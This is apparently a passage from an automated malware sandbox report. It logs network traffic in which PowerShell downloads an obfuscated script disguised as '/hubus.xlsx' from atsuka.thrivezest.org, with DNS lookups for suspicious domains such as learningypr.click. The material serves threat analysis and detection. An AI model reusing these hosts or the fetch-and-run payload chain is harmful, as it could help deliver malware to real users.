                                                                                                            Dec 22, 2024 13:42:29.827410936 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.827446938 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.827496052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.827636003 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:29.827709913 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:29.833545923 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:44:19.431298018 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:19.431370974 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:19.431458950 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:19.432651043 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:19.432681084 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:20.650022030 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:20.650106907 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:20.659360886 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:20.659382105 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:20.659688950 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:20.704062939 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:20.787569046 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:20.787595034 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:20.787708998 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:21.556899071 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:21.557008028 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:21.557055950 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:21.559804916 CET50007443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:21.559823990 CET44350007104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:21.568768978 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:21.568808079 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:21.568876028 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:21.569863081 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:21.569876909 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:22.788561106 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:22.788621902 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:22.791212082 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:22.791234016 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:22.791492939 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:22.792608023 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:22.792638063 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:22.792689085 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.596869946 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.596935987 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.596966028 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.596977949 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.596991062 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.597002029 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.597034931 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.597054005 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.597088099 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.597098112 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.605531931 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.605567932 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.605586052 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.605603933 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.607639074 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.613653898 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.668764114 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.668787003 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.715646029 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.716634035 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.762506962 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.788893938 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.792306900 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.792362928 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.792391062 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.799751043 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.799853086 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.799906015 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.800031900 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.800054073 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.800065994 CET50008443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.800071955 CET44350008104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.886992931 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.887068033 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:23.887182951 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.887487888 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:23.887506962 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:25.100260019 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:25.100378036 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:25.101996899 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:25.102010965 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:25.102942944 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:25.104221106 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:25.104356050 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:25.104403973 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:26.112847090 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:26.112974882 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:26.113048077 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:26.127388000 CET50009443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:26.127417088 CET44350009104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:26.171821117 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:26.171885967 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:26.171947002 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:26.172780037 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:26.172802925 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:27.404827118 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:27.404928923 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:27.408755064 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:27.408765078 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:27.409204006 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:27.410567045 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:27.410705090 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:27.410739899 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:27.410906076 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:27.410912037 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:28.306375027 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:28.306612015 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:28.306662083 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:28.308973074 CET50010443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:28.308999062 CET44350010104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:28.464879036 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:28.464996099 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:28.465075016 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:28.465406895 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:28.465436935 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:29.685497046 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:29.685592890 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:29.686903000 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:29.686930895 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:29.688011885 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:29.689244032 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:29.689362049 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:29.689409971 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:29.689476967 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:29.689495087 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:30.639364958 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:30.639652967 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:30.639719963 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:30.639858961 CET50011443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:30.639882088 CET44350011104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:30.981621027 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:30.981682062 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:30.981750011 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:30.982295990 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:30.982310057 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.200182915 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.200268030 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:32.201567888 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:32.201581955 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.201978922 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.203248024 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:32.203351021 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:32.203357935 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.998642921 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.998769999 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:32.998830080 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:32.999218941 CET50012443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:32.999241114 CET44350012104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:33.051783085 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:33.051810980 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:33.051939964 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:33.052216053 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:33.052232981 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:34.268855095 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:34.269634962 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:34.270941019 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:34.270973921 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:34.271331072 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:34.272346973 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:34.272384882 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:34.272396088 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:35.070957899 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:35.071196079 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:35.071270943 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:35.074033022 CET50014443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:35.074073076 CET44350014104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:35.108378887 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:35.108417988 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:35.108485937 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:35.126380920 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:35.126393080 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:36.342261076 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:36.342390060 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:36.343579054 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:36.343588114 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:36.343791962 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:36.344820023 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:36.344820023 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:36.344882965 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:37.097084999 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:37.097161055 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:37.097235918 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:37.097537994 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:37.097537994 CET50015443192.168.2.6104.21.48.1
                                                                                                            Dec 22, 2024 13:44:37.097559929 CET44350015104.21.48.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:37.097568035 CET44350015104.21.48.1192.168.2.6
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 22, 2024 13:42:11.875685930 CET5247953192.168.2.61.1.1.1
                                                                                                            Dec 22, 2024 13:42:12.198926926 CET53524791.1.1.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:19.090542078 CET4953853192.168.2.61.1.1.1
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET53495381.1.1.1192.168.2.6
                                                                                                            Dec 22, 2024 13:44:37.099562883 CET6467353192.168.2.61.1.1.1
                                                                                                            Dec 22, 2024 13:44:37.237675905 CET53646731.1.1.1192.168.2.6
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 22, 2024 13:42:11.875685930 CET192.168.2.61.1.1.10x187aStandard query (0)atsuka.thrivezest.orgA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.090542078 CET192.168.2.61.1.1.10x58aStandard query (0)learningypr.clickA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:37.099562883 CET192.168.2.61.1.1.10x2a1bStandard query (0)klipcatepiu0.shopA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 22, 2024 13:42:12.198926926 CET1.1.1.1192.168.2.60x187aNo error (0)atsuka.thrivezest.org104.21.18.182A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:42:12.198926926 CET1.1.1.1192.168.2.60x187aNo error (0)atsuka.thrivezest.org172.67.183.27A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 13:44:19.426053047 CET1.1.1.1192.168.2.60x58aNo error (0)learningypr.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            • atsuka.thrivezest.org
                                                                                                            • learningypr.click
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.649720104.21.18.1824431428C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:42:13 UTC81OUTGET /hubus.xlsx HTTP/1.1
                                                                                                            Host: atsuka.thrivezest.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-12-22 12:42:15 UTC987INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:42:15 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Content-Length: 9497057
                                                                                                            Connection: close
                                                                                                            X-Powered-By: Express
                                                                                                            ETag: W/"90e9e1-951ubQD+8RypHBQCGuzm21caIRQ"
                                                                                                            Set-Cookie: connect.sid=s%3ABULSIHd68yPUQIqW2SobLLY3TA_7Hw9R.N7a5AS9avCmfbyNgl%2Be%2F8Nx41AG8HT1ltzF7rMUaQpw; Path=/; HttpOnly
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fmf0TsixUw6bP4rVOMB0gEZzRPQwOlz0VrFOIhlGfPvVghuJx0pVdYrK%2FBQHFNTwesiZjZ2ELtn42oahq002n8pmGjgklhitTr3mYwKzk1OLnTkCHM01ctvquOnquU6nWuVsJJm2f1U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6030cbbe5b0f74-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1530&rtt_var=581&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=695&delivery_rate=1872995&cwnd=151&unsent_bytes=0&cid=e631f1887072c5ba&ts=1776&x=0"
                                                                                                            2024-12-22 12:42:15 UTC382INData Raw: 24 56 78 35 57 4b 51 68 55 4f 4e 32 6a 66 65 77 4c 50 74 78 79 47 71 6b 45 63 6b 30 70 59 52 69 48 53 71 46 32 35 4d 6b 74 69 75 56 68 35 71 62 4c 76 43 57 59 49 59 52 46 42 39 56 6a 6d 6c 53 4d 38 57 79 70 78 58 6e 42 62 42 45 65 41 4c 76 41 4d 4e 77 54 52 38 50 41 4e 64 70 30 7a 30 78 35 71 49 37 64 63 34 4a 58 62 6c 46 77 6a 36 72 33 4e 42 53 72 4b 35 35 62 78 44 65 41 63 61 32 32 47 58 42 6b 37 4e 64 61 52 68 6f 35 47 65 30 6e 4a 52 72 69 30 54 53 36 56 78 44 43 43 57 73 37 30 49 55 58 68 61 74 48 30 4e 77 34 58 34 31 70 32 61 5a 7a 70 68 6d 69 52 32 6f 4e 73 64 69 70 71 6f 65 50 59 39 4b 75 52 38 34 37 6d 42 65 73 6f 31 59 43 32 48 67 54 72 65 4d 78 44 63 4f 46 58 48 48 55 63 38 51 70 64 6a 53 57 75 75 74 7a 70 47 41 43 34 6c 36 38 72 55 76 68 41 66
                                                                                                            Data Ascii: $Vx5WKQhUON2jfewLPtxyGqkEck0pYRiHSqF25MktiuVh5qbLvCWYIYRFB9VjmlSM8WypxXnBbBEeALvAMNwTR8PANdp0z0x5qI7dc4JXblFwj6r3NBSrK55bxDeAca22GXBk7NdaRho5Ge0nJRri0TS6VxDCCWs70IUXhatH0Nw4X41p2aZzphmiR2oNsdipqoePY9KuR847mBeso1YC2HgTreMxDcOFXHHUc8QpdjSWuutzpGAC4l68rUvhAf
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 22 0d 0a 0d 0a 24 49 36 48 68 6d 37 72 75 67 58 35 34 50 49 44 67 44 63 50 76 68 67 51 45 37 50 34 7a 66 67 6c 76 43 74 47 43 33 7a 42 72 39 71 30 5a 74 68 50 71 54 52 4e 38 51 51 38 4e 61 71 4a 59 50 79 44 44 67 71 35 79 66 78 45 35 5a 56 62 6a 6a 51 6c 31 64 63 31 50 41 47 65 4e 59 4f 69 38 31 64 34 59 77 73 41 6b 4a 59 73 53 65 4b 32 63 66 61 30 33 4f 46 74 68 67 45 30 61 4d 74 51 55 76 47 64 79 62 70 4e 4a 34 44 6b 4a 61 44 74 63 59 44 55 41 63 63 75 5a 70 38 34 46 74 42 45 66 76 39 41 45 75 30 4a 70 71 6d 76 4d 4f 50 51 50 64 59 6a 69 4d 57 70 64 6e 31 53 42 70 65 4b 32 54 34 55 52 6a 66 56 74 53 61 4b 69 56 54 38 69 66 54 42 47 50 42 70 59 39 59 32 74 50 31 41 53 61 4d 61 72 38 32 4a 47 4c 38 36 37 61 6d 72 31 6d 6d 47 4d 6b 69 79 75 78 62 47 7a 4a
                                                                                                            Data Ascii: "$I6Hhm7rugX54PIDgDcPvhgQE7P4zfglvCtGC3zBr9q0ZthPqTRN8QQ8NaqJYPyDDgq5yfxE5ZVbjjQl1dc1PAGeNYOi81d4YwsAkJYsSeK2cfa03OFthgE0aMtQUvGdybpNJ4DkJaDtcYDUAccuZp84FtBEfv9AEu0JpqmvMOPQPdYjiMWpdn1SBpeK2T4URjfVtSaKiVT8ifTBGPBpY9Y2tP1ASaMar82JGL867amr1mmGMkiyuxbGzJ
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 71 50 55 70 36 76 69 37 74 59 71 46 4c 67 4c 69 37 49 54 72 51 45 57 33 6f 66 34 7a 48 55 31 44 4d 75 73 62 30 54 48 37 59 6f 79 38 32 50 62 6f 4f 36 56 76 37 68 42 6d 32 49 4b 39 46 38 50 55 6b 63 52 78 45 75 7a 66 53 4e 46 69 45 51 53 73 6f 74 31 75 65 4c 46 77 5a 52 35 49 73 65 6f 6b 70 77 6d 74 45 36 5a 76 6b 4b 47 56 34 77 77 68 44 68 62 39 44 56 49 4a 58 33 30 58 41 69 62 76 65 4f 67 68 45 54 32 30 59 77 55 67 73 4c 62 67 30 65 5a 54 6b 6e 5a 72 79 51 76 65 4a 6e 65 51 36 78 63 4a 55 58 46 53 6d 78 4e 50 79 76 4c 49 4d 72 65 42 59 45 57 4e 79 55 45 6b 46 72 50 32 44 65 74 51 4e 41 72 68 4c 50 6e 71 43 41 54 36 5a 46 32 57 78 7a 58 37 64 68 34 79 78 51 69 4c 4a 4f 46 4b 61 30 53 4a 4e 70 34 6b 33 54 4e 5a 4c 50 77 56 32 58 46 4b 4f 4c 50 71 57 58 45
                                                                                                            Data Ascii: qPUp6vi7tYqFLgLi7ITrQEW3of4zHU1DMusb0TH7Yoy82PboO6Vv7hBm2IK9F8PUkcRxEuzfSNFiEQSsot1ueLFwZR5IseokpwmtE6ZvkKGV4wwhDhb9DVIJX30XAibveOghET20YwUgsLbg0eZTknZryQveJneQ6xcJUXFSmxNPyvLIMreBYEWNyUEkFrP2DetQNArhLPnqCAT6ZF2WxzX7dh4yxQiLJOFKa0SJNp4k3TNZLPwV2XFKOLPqWXE
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 50 45 32 64 6c 64 74 77 48 41 34 6b 4c 32 38 4d 59 50 71 77 38 69 64 74 68 77 58 58 65 20 2b 20 24 56 6a 4d 37 34 73 56 73 66 6f 59 4a 44 51 34 55 6a 31 59 59 49 79 75 58 37 59 62 7a 64 6e 47 4f 49 70 67 74 67 4b 64 76 6e 4a 59 79 34 43 4b 49 41 61 63 55 70 73 47 53 4d 68 56 65 6a 66 46 39 52 56 65 78 31 4c 49 6b 31 57 52 79 63 43 69 30 30 79 58 71 49 79 73 79 64 31 33 69 68 6f 70 6f 55 63 6a 64 30 4e 69 71 50 34 6c 47 65 6f 72 46 39 65 69 32 72 66 31 49 33 50 4f 6d 4a 76 78 4c 56 75 50 39 51 62 30 75 55 43 78 72 4d 45 6e 36 78 4f 54 6a 53 54 75 4d 6d 77 61 59 6c 35 52 64 6a 51 70 62 75 54 4a 31 48 4d 65 50 30 75 4c 52 77 4e 30 54 70 47 30 6f 76 4f 41 61 7a 47 49 71 38 32 52 75 41 66 69 58 44 69 42 63 5a 32 33 78 58 31 34 4a 31 4a 70 63 7a 69 6e 53 6b 49
                                                                                                            Data Ascii: PE2dldtwHA4kL28MYPqw8idthwXXe + $VjM74sVsfoYJDQ4Uj1YYIyuX7YbzdnGOIpgtgKdvnJYy4CKIAacUpsGSMhVejfF9RVex1LIk1WRycCi00yXqIysyd13ihopoUcjd0NiqP4lGeorF9ei2rf1I3POmJvxLVuP9Qb0uUCxrMEn6xOTjSTuMmwaYl5RdjQpbuTJ1HMeP0uLRwN0TpG0ovOAazGIq82RuAfiXDiBcZ23xX14J1JpczinSkI
